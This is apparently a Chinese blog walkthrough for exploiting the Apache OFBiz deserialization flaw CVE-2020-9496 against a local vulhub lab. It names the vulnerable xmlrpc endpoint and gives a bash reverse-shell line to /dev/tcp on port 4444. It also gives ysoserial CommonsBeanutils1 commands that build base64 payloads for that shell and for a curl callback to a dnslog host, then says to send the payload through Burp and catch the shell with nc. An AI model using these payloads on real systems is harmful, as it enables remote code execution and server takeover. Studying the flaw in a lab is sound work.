Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)
2024-08-29 11:25:48
影响版本
- Apache Ofbiz:< 17.12.04
访问
https://192.168.49.2:8443/webtools/control/xmlrpc
抓包
进行数据包修改
payload地址
https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496
使用ysoserial的CommonsBeanutils1来生成Payload
首先对命令进行加密
http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/192.168.49.5/4444 0>&1
使用ysoserial工具进行一次base64编码
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjUvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "curl kktk1d.dnslog.cn" | base64 | tr -d "\n"
把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell
最新文章
- HashMap实现缓存
- 自定义AlertDialog控件的使用(AndroidStudio)
- Go! new Hello World, 我的第一个Go程序
- html5+css3 微信开发-学习实例
- loose coupling之函数签名
- C# 根据身份证号码获取简易信息
- Linux下的mongodb分片部署
- Socket编程(九)
- Textarea - 百度富文本编辑器插件UEditor
- Spring 4.0 中的 WebSocket 架构
- PHP学习之-1.2 认识PHP脚本标识
- spring mvc 与 jasper Report集成
- Android版数据结构与算法(八):二叉排序树
- Docker 学习3 Docker镜像管理基础
- 网络学习day04_VLSM、子网划分
- 回客科技 面试的 实现ioc 容器用到的技术,简述BeanFactory的实现原理,大搜车面试的 spring 怎么实现的依赖注入(DI)
- vs2017 C4996 错误
- kubernetes的应用数据持久化
- Yii2 数据操作Query Builder查询数据
- 字符集不同导致的ORA-00972
热门文章
- 「模拟8.18」字符串(卡特兰数)&#183;乌鸦喝水(树状数组,二分)&#183;所驼门王的宝藏(tarjan,拓扑)
- Linux中查看网络命令
- docker-compose 部署 Apollo 自定义环境
- Map类型的Json格式
- 『动善时』JMeter基础 — 49、使用JMeter自身代理录制APP测试脚本
- RobotFramework + Python 自动化入门 二 (关键字)
- typescript 中的 infer 关键字的理解
- 20201123 实验三《python程序设计》实验报告
- IP地址与子网的划分
- 【Spring Cloud &; Alibaba 实战 | 总结篇】Spring Cloud Gateway + Spring Security OAuth2 + JWT 实现微服务统一认证授权和鉴权